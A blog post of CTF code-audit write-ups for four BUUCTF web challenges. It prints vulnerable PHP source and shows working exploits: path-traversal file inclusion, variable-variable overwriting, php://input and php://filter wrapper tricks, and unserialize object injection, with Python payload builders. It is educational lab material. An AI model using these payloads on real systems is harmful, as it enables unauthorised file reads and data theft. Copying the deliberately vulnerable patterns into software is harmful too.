buu Code Audit

Posted by Yolololololo on 2024-06-08

Code Audit

[HCTF 2018] WarmUp

View the page source.

Visit source.php:

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            // 1. exact match against the whitelist
            if (in_array($page, $whitelist)) {
                return true;
            }

            // 2. only the part before the first '?' is checked;
            //    everything after it is ignored here, but not by include
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            // 3. the same truncated check again after an extra urldecode()
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];   // the full, untruncated value is included
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }

Looking at hint.php: it says the flag is not here but in ffffllllaaaagggg.

The include call is a file-inclusion vulnerability. checkFile only validates the part of file before the first ?, while include receives the whole string, so a value such as hint.php?/../../../../ffffllllaaaagggg passes the whitelist and is then opened as a path.

../ goes up one directory level; repeat it enough times to climb from the web root to the flag file.
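To make the bypass concrete, here is an added Python model of checkFile and of the path that include actually opens; it is not part of the original challenge or of this writeup. The document root /var/www/html and the use of posixpath.normpath to stand in for PHP's lexical handling of .. before open() are assumptions.

```python
import posixpath
from urllib.parse import unquote_plus

# Constructed model of emmm::checkFile from source.php (not the page's own code).
WHITELIST = {"source": "source.php", "hint": "hint.php"}
DOCROOT = "/var/www/html"  # assumption: where source.php lives on the server


def check_file(page):
    """Return True if the PHP whitelist logic would accept `page`."""
    if not isinstance(page, str) or page == "":
        return False
    allowed = set(WHITELIST.values())
    if page in allowed:                     # 1st in_array: exact match
        return True
    if page.split("?", 1)[0] in allowed:    # mb_substr(..., 0, mb_strpos($page.'?', '?'))
        return True
    decoded = unquote_plus(page)            # urldecode($page), then the same truncation
    if decoded.split("?", 1)[0] in allowed:
        return True
    return False


def include_target(page):
    """Path that `include $page` resolves to, modelling PHP's lexical '..'
    handling with posixpath.normpath (assumption). No URL decoding happens
    here, unlike the third check above."""
    return posixpath.normpath(posixpath.join(DOCROOT, page))


def exploit_url(flag_path="ffffllllaaaagggg", depth=4):
    """Build the file= value: a whitelisted name, a '?' so the check stops
    there, then enough '../' to climb out of DOCROOT to the flag file."""
    return "hint.php?/" + "../" * depth + flag_path


if __name__ == "__main__":
    # "hint.php%3F/../x" passes only via the urldecode branch; note that the
    # include still sees the literal "%3F", so check and include disagree.
    for p in ["hint.php", "../../etc/passwd", exploit_url(), "hint.php%3F/../x"]:
        print(f"{p!r:45} check={check_file(p)!s:5} include -> {include_target(p)}")
```

The depth argument is whatever is needed for the real document root; on the server the value sent via the URL is already decoded once by PHP, so reaching the urldecode branch needs %253F rather than %3F.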

[BJDCTF2020]Mark loves cat

A dirsearch scan shows a .git leak.

githack.py downloads the source; index.php:

<?php
include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

// every POST key becomes a variable holding the literal value: $$x = $y
foreach($_POST as $x => $y){
    $$x = $y;
}

// every GET key becomes a variable holding the value of the variable NAMED by $y,
// so ?yds=flag executes $yds = $flag
foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

echo "the flag is: ".$flag;

flag.php

<?php

$flag = file_get_contents('/flag');

The foreach loops cause variable overwriting.

foreach is the loop construct for arrays and objects.

  • <?php
       $authors = array( "Java", "PHP", "CSS", "HTML" ); 
    
       foreach ( $authors as $val ) { 
           echo $val . "\n";   // prints Java, PHP, CSS, HTML on separate lines
       }   
    ?>

  • <?php
    $myBook = array( "title" =>  "Learn PHP from www.w3cschool.cn", 
                    "author" =>  "www.w3cschool.cn", 
                    "pubYear" =>  2000 ); 
    
    // key => value form: each iteration receives the key and its value
    foreach ( $myBook as $key =>  $value ) { 
       echo "$key  \n"; 
       echo "$value \n"; 
    } 
    
    ?>

  • <?php
    $authors = array( "Java", "PHP", "CSS", "HTML" );
    
    // Displays "Java PHP Javascript HTML"
    foreach ( $authors as $val ) {
        if ( $val == "CSS" ) $val = "Javascript";
        echo $val . " ";
    }
    
    // $val is a copy, so the array itself is unchanged: still Java, PHP, CSS, HTML
    print_r ( $authors );
    ?>


Variable variables

If a variable's value happens to be the name of another variable, that other variable can be reached through the first one.

Method: put an extra $ in front of the variable.

For example, $$x is equivalent to ${$x}.

1. Construct the payload

yds=flag (as a GET parameter)

exit() with a string argument also prints that string.

yds=flag is processed by the GET loop as $yds = $flag.

Because neither $_GET['flag'] nor $_POST['flag'] is set, the script reaches exit($yds) and prints the flag. $handsome = 'yds' plays no part in this route; it only matters for the exit($handsome) branch.

2. Construct the payload

is=flag&flag=flag (as GET parameters)

After the GET loop, $is = $flag, so exit($is) prints the flag. flag=flag is needed so that the exit($is) branch is reached: the first loop does not fire because $x !== 'flag' fails for the flag key, and the isset check passes.
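An added Python model of the whole index.php flow (not the page's or the challenge's code; the flag value is a constructed placeholder). It runs both payloads from this writeup, a third route through $handsome that the writeup does not cover, and shows why sending the same key via POST only echoes the literal string.

```python
FLAG = "flag{constructed-placeholder}"  # stands in for file_get_contents('/flag')


def run_index(get, post):
    """Model of index.php. `get`/`post` are dicts of request parameters in
    query-string order; the return value is what PHP would print
    (exit($var) prints a string argument)."""
    scope = {"flag": FLAG, "yds": "dog", "is": "cat", "handsome": "yds"}

    for x, y in post.items():          # foreach($_POST as $x => $y) $$x = $y;
        scope[x] = y                   # the literal value is copied
    for x, y in get.items():           # foreach($_GET as $x => $y) $$x = $$y;
        scope[x] = scope.get(y)        # value of the variable NAMED by y (null if unset)

    for x in get:                      # if($_GET['flag'] === $x && $x !== 'flag') exit($handsome);
        if get.get("flag") == x and x != "flag":
            return scope.get("handsome")
    if "flag" not in get and "flag" not in post:                 # exit($yds);
        return scope.get("yds")
    if post.get("flag") == "flag" or get.get("flag") == "flag":  # exit($is);
        return scope.get("is")
    return "the flag is: " + str(scope.get("flag"))


PAYLOADS = {
    "1: ?yds=flag":                    ({"yds": "flag"}, {}),
    "2: ?is=flag&flag=flag":           ({"is": "flag", "flag": "flag"}, {}),
    "3: ?handsome=flag&flag=handsome": ({"handsome": "flag", "flag": "handsome"}, {}),
    "POST yds=flag (fails)":           ({}, {"yds": "flag"}),
}

if __name__ == "__main__":
    for name, (g, p) in PAYLOADS.items():
        print(f"{name:35} -> {run_index(g, p)}")
```

Route 3 works because the GET loop first sets $handsome = $flag and then $flag = $handsome, after which the first check loop matches $_GET['flag'] === 'handsome' and exits with $handsome.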

[HCTF 2018]admin

Opening the page shows nothing.

Viewing the source reveals login and register pages.

Registering admin/admin reports that the account is already registered.

Register an arbitrary account and log in.

Seen on the change page:

Visited it:

ok 404 nice!

Looked at a writeup; reference: BUUCTF [HCTF 2018]admin 1.

The code audit leads to the flag: it is returned when the session says the user is admin.

Forge that session with a tool.

[ZJCTF 2019]NiZhuanSiWei

Source:

<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit();
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

file_get_contents reads a file into a string.

Use the php://input wrapper so that file_get_contents reads the raw POST body instead of a real file.

The string read must equal welcome to the zjctf, so send exactly that as the POST body.

Construct the payload: GET text=php://input with the POST body welcome to the zjctf, and the page echoes it back.

Including flag.php directly fails: file is matched against /flag/ and the page replies Not now!.

Read the useless.php source instead with php://filter: file=php://filter/read=convert.base64-encode/resource=useless.php.

base64-decode the output.

The decoded class has a __toString method that reads the file named by its file property.

Construct the serialized payload to read flag.php (set the file property to flag.php where the placeholder N was), include useless.php as file so the class is defined, and pass the object as password; echo $password triggers __toString.

View the page source of the response to see the flag.
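An added Python helper (not from this writeup or the challenge) that builds the three request pieces: the POST body for php://input, the php://filter URL for reading useless.php past the /flag/ regex, and the serialized Flag object. The class layout (one public property named file) is taken from the decoded useless.php; the target host is an assumption.

```python
from urllib.parse import quote

HOST = "http://target.example"  # assumption: the challenge instance


def file_param_blocked(file_param):
    """Mirrors preg_match("/flag/", $file) in the challenge source."""
    return "flag" in file_param


def php_filter_read(resource):
    """php://filter chain that returns the file base64-encoded instead of
    executing it, so PHP source can be read through include()."""
    return f"php://filter/read=convert.base64-encode/resource={resource}"


def php_serialize_object(cls, props):
    """Serialize a PHP object with public string properties. Lengths are
    BYTE lengths (s:N:"..."), which is what unserialize() checks."""
    body = "".join(
        f's:{len(k.encode())}:"{k}";s:{len(v.encode())}:"{v}";'
        for k, v in props.items()
    )
    return f'O:{len(cls.encode())}:"{cls}":{len(props)}:{{{body}}}'


def build_request(file_param, password):
    """Query string for text/file/password plus the body php://input reads."""
    if file_param_blocked(file_param):
        raise ValueError(f"{file_param!r} matches /flag/ and would get 'Not now!'")
    params = {"text": "php://input", "file": file_param, "password": password}
    query = "&".join(f"{k}={quote(v, safe='')}" for k, v in params.items())
    return {"url": f"{HOST}/?{query}", "method": "POST", "body": "welcome to the zjctf"}


# Step 1: leak useless.php (base64 in the response) and decode it offline.
# Step 2: include useless.php itself so class Flag is defined, and pass the
#         serialized object as password; echo $password calls Flag::__toString,
#         which reads $this->file.
FLAG_PAYLOAD = php_serialize_object("Flag", {"file": "flag.php"})

if __name__ == "__main__":
    print(build_request(php_filter_read("useless.php"), "")["url"])
    print(FLAG_PAYLOAD)
    print(build_request("useless.php", FLAG_PAYLOAD)["url"])
```

The serialized string is URL-encoded as a whole, since its quotes, braces and semicolons would otherwise be mangled in the query string.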
